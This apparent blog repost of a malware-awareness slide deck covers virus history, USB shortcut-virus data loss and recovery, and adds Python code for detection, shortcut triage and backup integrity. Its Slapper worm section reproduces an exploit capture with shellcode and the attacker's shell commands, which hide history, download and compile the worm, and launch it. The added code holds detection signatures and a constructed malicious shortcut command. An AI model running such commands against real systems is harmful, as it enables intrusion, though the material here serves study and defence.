Virus & data protection by DKSoft

Posted on 22-Jul-2015


Virus & Data Protection

– Research by DKSoft...

Definitions of Virus History of Virus Goal & Properties of VirusWorking of a Slapper (Worm Virus) Common experience of losing data

Agenda

Overview of Virus
History of Virus
Special Types of Trojans (Major Type of Virus)
Concept of latest Trojans
Virus Program Execution
Working of a Slapper (Worm Virus)
Data loss
Data Protection
Recommended Anti-Virus Softwares


Overview of Virus

Virus – a malicious program carrying destructive code that starts replicating, and infects the OS or user data, as soon as it is accessed (executed).

Major Types of Viruses (the deck uses "virus" loosely for malware in general; strictly, Trojans and worms are separate classes of malware): Trojan Horse, Worm

Some Features of Virus:
locates & infects ".exe", ".com" and ".dll" files
deletes files, shuts down programs, eats up system resources, hides or alters data
some variants carry their replication logic in VB (.vbs) or command (.bat/.cmd) scripts rather than in compiled code (optional)


History of Virus

1. Elk Cloner: the first virus seen in the wild, written by Richard Skrenta in 1982 for the Apple II. It copied itself to the boot sector of every floppy inserted into an infected machine and stayed resident in RAM.

2. "Brain": the first major PC (MS-DOS) virus, written in Lahore, Pakistan in 1986. It infected the boot sector of floppy disks.

Image: hex dump of a worm leaving a message for Bill Gates III
Image: boot sector of a floppy infected by "Brain"

Special Types of Trojans

Exploit – abuses a vulnerability in the OS or an application to run malicious code
Backdoor – gives an unauthorized remote user control of the computer
DDoS – makes the infected computer flood a target web address with traffic until it fails
Tiny Trojan Banker – steals the bank details of a user or organization
FakeAV – convinces the user that the PC is infected so that they pay for a fake clean-up tool
Ransom – blocks or encrypts the data on a computer and demands payment to restore it
Downloader – programmed to download & install new malicious programs
Spy – invisible to the user & observes computer activity silently, e.g. by taking screenshots
SpyEye – targets airline travel & banking websites
Zeus – steals banking details & personal data and takes part in fraud schemes & other criminal activity
AIDS – infects ".exe" & ".com" files

Concept of latest Trojan

Diagram: shortcut file → (target address) → cmd.exe → opens → explorer.exe → hidden data

Step 1: Waits until it is accessed by the user or the anti-virus
Step 2: Attaches itself to specified system files
Step 3: Permanently hides all files & folders present on external drives (sets the hidden and system attributes on them)
Step 4: Creates a shortcut (.lnk) for every file & folder present on the external drive
Step 5: When a shortcut is opened, runs the malware through cmd.exe and then opens the real file/folder with explorer.exe, so the user notices nothing
Step 6: Some variants use VB or command scripts for replication, and some can self-replicate to every external drive connected to the infected computer

The shortcut is the front end the user sees; at the back end its target field holds the address of the hidden data together with the command that launches the malware.

Virus Program Execution

Flowchart: a normal program (Start → End) compared with an infected program, in which the virus code runs before control is handed to the original program.

Working of Slapper

Slapper Requesting

The worm first sends a bare HTTP/1.1 request with no Host header. Apache 1.3 rejects it with a 400 and, in doing so, reveals its Server banner (Apache version, Linux distribution, mod_ssl and OpenSSL versions), which the worm uses to pick the right exploit variant for the target. Dots in the capture are non-printable bytes (CR/LF).

68.168.1.15:52160 -> 127.0.0.1:80
GET / HTTP/1.1....

127.0.0.1:80 -> 68.168.1.15:52160
HTTP/1.1 400 Bad Request..Date: Sun, 22 Sep 2002 03:41:10 GMT..Server: Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b DAV/1.0.2 PHP/4.0.6 mod_perl/1.24_01..Connection: close..Transfer-Encoding: chunked..Content-Type: text/html; charset=iso-8859-1....169..<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">.<HTML><HEAD>.<TITLE>400 Bad Request</TITLE>.</HEAD><BODY>.<H1>Bad Request</H1>.Your browser sent a request that this server could not understand.<P>.client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): <P>.<HR>.<ADDRESS>Apache/1.3.20 Server at 127.0.0.1 Port 80</ADDRESS>.</BODY></HTML>...0....

Slapper Attacking

Next the worm connects to port 443 and sends an oversized SSLv2 client handshake (the OpenSSL KEY_ARG buffer overflow, CVE-2002-0656). The long run of "A" bytes is the overflow padding, and the tail "1.Ph//shh/bin..PS" is classic x86 shellcode: xor eax,eax; push eax; push "//sh"; push "/bin"; mov ebx,esp; push eax; push ebx, which builds the string "/bin//sh" on the stack for execve.

...........N..zCyhy...i..B...y...c....t...D.1..9P`.8../9...-

..............hjE.H.o.,B...."Oo...:.....'...i..%._~-

...Z...RqAJX...p3.....p5o.j.../4/.H,AAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA........AAAA....AAAAAAAAAAAA..G

@AAAA............AAAAAAAA....................................1...

.w..w..O.O.....1.....Q1..f......Y1.9.u.f..Xf9F.t.....1...1..?I..A

..1...Q[....1.Ph//shh/bin..PS.......

[..]

68.168.1.15:52312 -> 127.0.0.1:443
export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null; export PATH=$PATH:/bin:/sbin:/usr/bin:/usr/sbin;exec bash -i.

The shellcode gives the attacker an interactive bash over the same connection on port 443, in plaintext. HISTFILE=/dev/null keeps the session out of the shell history and HOME=/tmp avoids writing into a real user's home directory.

Compiling and Installing

68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update; exit; .

68.168.1.15:52312 -> 127.0.0.1:443
rm -rf /tmp/.unlock.uu /tmp/.unlock.c /tmp/.update.c /tmp/httpd /tmp/update /tmp/.unlock; .cat > /tmp/.unlock.uu << __eof__; .begin 655 .unlock
[worm source code, in uuencoded format, omitted]

68.168.1.15:52312 -> 127.0.0.1:443
uudecode -o /tmp/.unlock /tmp/.unlock.uu; tar xzf /tmp/.unlock -C /tmp/;gcc -o /tmp/httpd /tmp/.unlock.c -lcrypto; gcc -o /tmp/update /tmp/.update.c;./tmp/httpd 68.168.1.15; /tmp/update; .

The worm ships as uuencoded source, decodes and compiles itself on the victim with the local gcc (so it only spreads to hosts that have a compiler), names the binary /tmp/httpd to blend in with the web server, and starts it with the attacker's IP as its first peer.

68.168.1.15:52312 -> 127.0.0.1:443

Remote Communications

Once running, the worm joins a peer-to-peer network over UDP port 4156 (this variant): each infected host talks to the peer that infected it and relays commands to the others. The tcpdump excerpt below is the first packet from the new victim to the worm host; 0x103c is port 4156, used as both source and destination port.

obs: XXXX XXXX == localhost IP
YYYY YYYY == worm_host IP
0x70 == Incoming client flag

127.0.0.1.4156 > 68.168.1.15.4156: udp 28 (DF)
0x0000 4500 0038 0000 4000 4011 beb3 XXXX XXXX E..8..@.@.......
0x0010 YYYY YYYY 103c 103c 0024 92cb 0000 0000 ...'.<.<.$......
0x0020 8fff 0000 25b8 aaa8 7000 0000 0000 0000 ....%...p.......
                           ^^
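Detection logic for the exchange above, written here as an added example (it is not code from the deck or from the Slapper analysis it reproduces). It runs three checks over constructed flow records transcribed from the capture: the banner probe (a GET with no Host header and the Server header it draws out), the exploit payload to 443 (the "/bin//sh" push sequence and the 0x41 padding run), and the plaintext shell and UDP/4156 peer traffic that follow. The IPs and ports are those in the capture; the SSLv2 record bytes in the sample are a shortened stand-in, not the real exploit.

```python
"""Slapper-style detection over captured flows (added example; constructed data)."""
import re
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Flow:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str      # "tcp" or "udp"
    payload: bytes


# Stage 1: recon. A GET with no Host header makes Apache 1.3 answer 400 and leak its banner.
def missing_host_header(request: bytes) -> bool:
    head = request.split(b"\r\n\r\n", 1)[0]
    return head.startswith(b"GET ") and re.search(rb"(?im)^host:", head) is None


def leaked_server_banner(response: bytes) -> str:
    """Server header value the worm reads to choose its exploit variant ('' if absent)."""
    m = re.search(rb"(?im)^server:[ \t]*(.+?)\r?$", response)
    return m.group(1).decode("latin-1").strip() if m else ""


# Stage 2: exploit. "h//shh/bin" is the ASCII view of
#   push 0x68732f2f ('//sh'); push 0x6e69622f ('/bin')  -> execve("/bin//sh") shellcode.
SHELLCODE_MARK = b"h//shh/bin"
PADDING = re.compile(rb"A{40,}")          # the long 0x41 run that overflows KEY_ARG

# Stage 3: post-exploit. Shell commands in the clear on a port that should carry TLS.
SHELL_MARKS = (b"HISTFILE=/dev/null", b"exec bash -i", b"uudecode", b"gcc -o /tmp/")
P2P_PORT = 4156                           # UDP port used by this Slapper variant


def classify(flow: Flow) -> List[str]:
    hits: List[str] = []
    if flow.proto == "tcp" and flow.dport == 80 and missing_host_header(flow.payload):
        hits.append("recon: HTTP/1.1 GET without Host header (banner probe)")
    if flow.proto == "tcp" and flow.dport == 443:
        if SHELLCODE_MARK in flow.payload or PADDING.search(flow.payload):
            hits.append("exploit: shellcode/padding in SSLv2 handshake to 443")
        found = [m.decode() for m in SHELL_MARKS if m in flow.payload]
        if found:
            hits.append("post-exploit: plaintext shell on 443: " + ", ".join(found))
    if flow.proto == "udp" and flow.sport == P2P_PORT and flow.dport == P2P_PORT:
        hits.append("c2: Slapper peer-to-peer traffic on UDP/%d" % P2P_PORT)
    return hits


# Constructed sample flows, transcribed from the capture above. The 443 exploit payload
# is a shortened stand-in: a few record bytes, the padding run and the shellcode tail.
ATTACKER, VICTIM = "68.168.1.15", "127.0.0.1"
SAMPLE_FLOWS = [
    Flow(ATTACKER, 52160, VICTIM, 80, "tcp", b"GET / HTTP/1.1\r\n\r\n"),
    Flow(VICTIM, 80, ATTACKER, 52160, "tcp",
         b"HTTP/1.1 400 Bad Request\r\nDate: Sun, 22 Sep 2002 03:41:10 GMT\r\n"
         b"Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b\r\n"
         b"Connection: close\r\n\r\n"),
    Flow(ATTACKER, 52312, VICTIM, 443, "tcp",
         b"\x80\x1c\x01\x00\x02" + b"A" * 200 + b"\x31\xc0Ph//shh/bin\x89\xe3PS"),
    Flow(ATTACKER, 52312, VICTIM, 443, "tcp",
         b"export TERM=xterm;export HOME=/tmp;export HISTFILE=/dev/null;exec bash -i\n"),
    Flow(VICTIM, P2P_PORT, ATTACKER, P2P_PORT, "udp",
         bytes.fromhex("8fff000025b8aaa870000000")),
]


def run(flows: List[Flow] = SAMPLE_FLOWS) -> Dict[int, List[str]]:
    """Map flow index -> alerts, for every flow that tripped at least one rule."""
    return {i: classify(f) for i, f in enumerate(flows) if classify(f)}


if __name__ == "__main__":
    for i, alerts in run().items():
        print(i, SAMPLE_FLOWS[i].proto, SAMPLE_FLOWS[i].dport, alerts)
```

The response flow (index 1) raises nothing by itself; the banner it leaks is what the recon rule is really about, and the fix on the server side is to stop advertising versions (ServerTokens Prod in Apache) rather than to block 400 responses. The stage 3 rules are the cheapest and most durable: shell keywords in the clear on 443 and same-port UDP between hosts never look legitimate.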

Data Loss

Firstly, when a virus-infected pen drive is inserted into a non-infected PC, every item on the pen drive appears as a shortcut, usually 1 KB or 2 KB in size (larger in rare cases).

Secondly, the user opens a folder (actually its shortcut) and, seeing the contents, feels that all the data is safe. This is the moment the virus spreads to the PC, and from there to every external device connected to it in future.

The user then scans the pen drive and tells the anti-virus to take action.

The anti-virus deletes the shortcut files found on the scanned pen drive (the hidden originals are still there, but the user cannot see them).

After the scan, the user opens the pen drive: "OMG! I lost my important data."

The virus reappears even on a non-infected pen drive, because the PC itself is now infected. It spreads and replicates to all external USB devices, infected or not.

Data Protection

When a virus-infected pen drive is inserted into a non-infected PC, note that every item on the pen drive appears as a shortcut. Never touch the shortcut files.

Go to "Folder Options" in "Control Panel"
Click on the "View" tab at the top of "Folder Options"
1. Tick "Show hidden files, folders and drives"
2. Untick "Hide protected operating system files (Recommended)"
3. Open the same pen drive again

What you now see:
the VB script & its shortcut (Trojan virus) containing the code the virus uses to replicate
the original user data, permanently hidden (the malware marks it hidden + system, hence step 2)
Trojan or worm viruses (as shortcuts to the original data)
a ".Trashes" folder at the top: this is the drive's trash (recycle bin) folder created by macOS, and is normally present on drives that have been used on a Mac

Screenshots: properties of the Trojan (shortcut); properties of the user data folder

If the files are present inside the hidden folder, they are 99.99% safe. They can be copied or moved to any other directory; do this to avoid data corruption.

Scan, then take a safe copy of the required data from the hidden folder.

Never touch the auto-created shortcut files or unknown files.
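A worked version of the triage this section and the "Concept of latest Trojan" steps describe, added here as an example (not the deck's code, and not a cleaning tool from any vendor). It parses .lnk files with the Shell Link binary format (fixed 76-byte header, optional IDList and LinkInfo blocks, then length-prefixed StringData) to see what a shortcut really launches, then splits a drive listing into data to recover and artefacts to leave alone. The sample drive, its file names and the .lnk bytes are constructed for the example; the launcher and script-extension lists are the author's own choices.

```python
"""Shortcut-virus triage (added example; constructed sample data)."""
import struct
from dataclasses import dataclass
from typing import Dict, List, Tuple

# MS-SHLLINK: 76-byte header, optional IDList / LinkInfo, then StringData.
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-...-46}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
ATTR_HIDDEN, ATTR_SYSTEM = 0x02, 0x04        # Windows file attribute bits


def parse_lnk(data: bytes) -> Dict[str, str]:
    """Return the StringData fields: name, relative_path, working_dir, arguments, icon."""
    size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if size != 0x4C or clsid != LNK_CLSID:
        raise ValueError("not a shell link file")
    pos = 0x4C
    if flags & HAS_IDLIST:          # LinkTargetIDList: uint16 size, then that many bytes
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:        # LinkInfo: uint32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    out: Dict[str, str] = {}
    for bit, key in ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                     (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"), (HAS_ICON, "icon")):
        if flags & bit:             # StringData: uint16 character count, then the characters
            n = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            width = 2 if flags & IS_UNICODE else 1
            out[key] = data[pos:pos + n * width].decode("utf-16-le" if width == 2 else "cp1252")
            pos += n * width
    return out


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal .lnk, shaped like the ones the shortcut virus drops."""
    header = struct.pack("<I16sI", 0x4C, LNK_CLSID, HAS_RELPATH | HAS_ARGS | IS_UNICODE)
    header += bytes(0x4C - len(header))     # zero the remaining header fields
    sd = lambda s: struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return header + sd(relative_path) + sd(arguments)


LAUNCHERS = ("cmd.exe", "wscript", "cscript", "powershell", "mshta", "rundll32")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".bat", ".cmd", ".scr", ".pif")


def shortcut_is_malicious(lnk: bytes) -> bool:
    """A shortcut to a folder or document has no business launching an interpreter."""
    info = parse_lnk(lnk)
    command = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    return any(launcher in command for launcher in LAUNCHERS)


@dataclass
class Entry:
    name: str
    is_dir: bool
    attrs: int = 0          # the malware sets hidden + system on the real data
    data: bytes = b""       # file content, only needed for .lnk files


def triage(listing: List[Entry]) -> Tuple[List[str], List[str]]:
    """Split a drive listing into (recover, quarantine)."""
    recover, quarantine = [], []
    for e in listing:
        lname = e.name.lower()
        if e.is_dir:
            recover.append(e.name)                  # user folders, hidden+system or not
        elif lname.endswith(".lnk"):
            try:
                bad = shortcut_is_malicious(e.data)
            except (ValueError, struct.error):
                bad = True                          # unparsable shortcut: treat as hostile
            (quarantine if bad else recover).append(e.name)
        elif lname.endswith(SCRIPT_EXTS) or lname == "autorun.inf":
            quarantine.append(e.name)               # replication scripts and autorun hooks
        else:
            recover.append(e.name)
    return recover, quarantine


# Constructed infected pen drive, as seen once hidden and system files are shown.
MALICIOUS_LNK = build_lnk(r"..\Windows\System32\cmd.exe",
                          r'/c start wscript.exe //B autorun.vbs & start explorer.exe "My Photos"')
BENIGN_LNK = build_lnk(r"..\Docs\report.pdf", "")
SAMPLE_DRIVE = [
    Entry("My Photos", True, ATTR_HIDDEN | ATTR_SYSTEM),
    Entry("My Photos.lnk", False, 0, MALICIOUS_LNK),
    Entry("autorun.vbs", False, ATTR_HIDDEN | ATTR_SYSTEM),
    Entry("report.lnk", False, 0, BENIGN_LNK),
    Entry("notes.txt", False),
]

if __name__ == "__main__":
    print(parse_lnk(MALICIOUS_LNK))
    print(triage(SAMPLE_DRIVE))
```

Run it against a real drive by building the listing from the file system and reading only the .lnk contents; copy the "recover" list to a clean location first, and only then clear the attributes the malware set (on Windows, attrib -h -s -r /s /d on the drive) so the originals become visible again. Opening a shortcut at any point undoes the whole exercise.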

Read Privacy Statements
Understand what you are getting before you agree to download or share your personal information

Think Before You Click
Be cautious with e-mail attachments and links
Only download files from websites you trust

Safely remove external drives, shut down the computer properly & don't save data on the system partition

Use PowerISO, WinISO, UltraISO, MagicISO or any other such software to keep data backups as ".iso" images

A suspect file can be quarantined inside an ".iso" image as a locker: once the image is mounted it is read-only, so the file cannot modify itself or anything else in the image. It will still run if the user opens it, so keep it there only for later analysis.

Advantages of creating ".iso" Image Data

Easy to create
Read-only once mounted: the OS, anti-virus or malware cannot modify or delete files inside it without the user's permission. The ".iso" file itself is still an ordinary file that can be deleted, overwritten or encrypted by ransomware, so it is not true that it "never corrupts"; keep a checksum of the image and a copy offline
Mount it to a virtual drive & access it at high speed
Portable to every OS that supports ".iso" image data
Will not compress data (files are stored as-is, so the image is at least as large as its contents)
Note that an ".iso" gives no confidentiality: anyone who has the file can read everything in it, so it protects data against accidental change, not against theft
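Since an image file can be corrupted or altered like any other file, the check a practitioner adds to an ".iso" backup is a hash manifest written when the image is created and verified before the backup is relied on. The example below is added here (it is not the deck's procedure or any ISO tool's feature); the backup contents are constructed, and read_tree shows how a mounted image would be loaded into the same form.

```python
"""Integrity check for .iso (or any) backups (added example; constructed sample data)."""
import hashlib
from pathlib import Path
from typing import Dict, List

Manifest = Dict[str, str]          # relative path -> hex SHA-256


def sha256_bytes(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


def sha256_file(path: Path, chunk: int = 1 << 20) -> str:
    """Hash a large file (e.g. the .iso itself) without loading it into memory."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def build_manifest(files: Dict[str, bytes]) -> Manifest:
    """One digest per file; store the result next to (not inside) the image."""
    return {name: sha256_bytes(blob) for name, blob in sorted(files.items())}


def verify(files: Dict[str, bytes], manifest: Manifest) -> Dict[str, List[str]]:
    """Report every difference between the current contents and the manifest."""
    report: Dict[str, List[str]] = {"modified": [], "missing": [], "unexpected": []}
    for name, digest in manifest.items():
        if name not in files:
            report["missing"].append(name)
        elif sha256_bytes(files[name]) != digest:
            report["modified"].append(name)
    report["unexpected"] = sorted(set(files) - set(manifest))
    return report


def read_tree(root: Path) -> Dict[str, bytes]:
    """Load a mounted image (or any folder) into the name -> bytes form used above."""
    return {p.relative_to(root).as_posix(): p.read_bytes()
            for p in sorted(root.rglob("*")) if p.is_file()}


# Constructed backup set, then the same set after one file was silently altered.
BACKUP = {
    "photos/a.jpg": b"\xff\xd8\xff\xe0 jpeg bytes",
    "docs/thesis.docx": b"PK\x03\x04 docx bytes",
}
TAMPERED = {**BACKUP, "photos/a.jpg": b"\xff\xd8\xff\xe0 jpeg bytes, one bit flipped"}

if __name__ == "__main__":
    manifest = build_manifest(BACKUP)
    print(verify(BACKUP, manifest))
    print(verify(TAMPERED, manifest))
```

A clean verify returns three empty lists; anything in "modified" or "missing" means the copy cannot be trusted, and "unexpected" catches files that were added to a backup that should be frozen. Keep the manifest (or at least the digest of the whole .iso from sha256_file) somewhere the malware or ransomware that hit the original cannot reach.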

Recommended Anti-Virus based on security levels:
1. SkyLabs Kaspersky
2. Symantec Norton
3. ESET
4. Bitdefender
5. Trend Micro
6. AVG
7. MS Essentials

Recommended Anti-Virus by popularity levels:
1. SkyLabs Kaspersky
2. Bitdefender
3. Symantec Norton
4. MS Essentials
5. Trend Micro
6. AVG
7. ESET

– Research continued by DKSoft...

dksoft2015.blogspot.in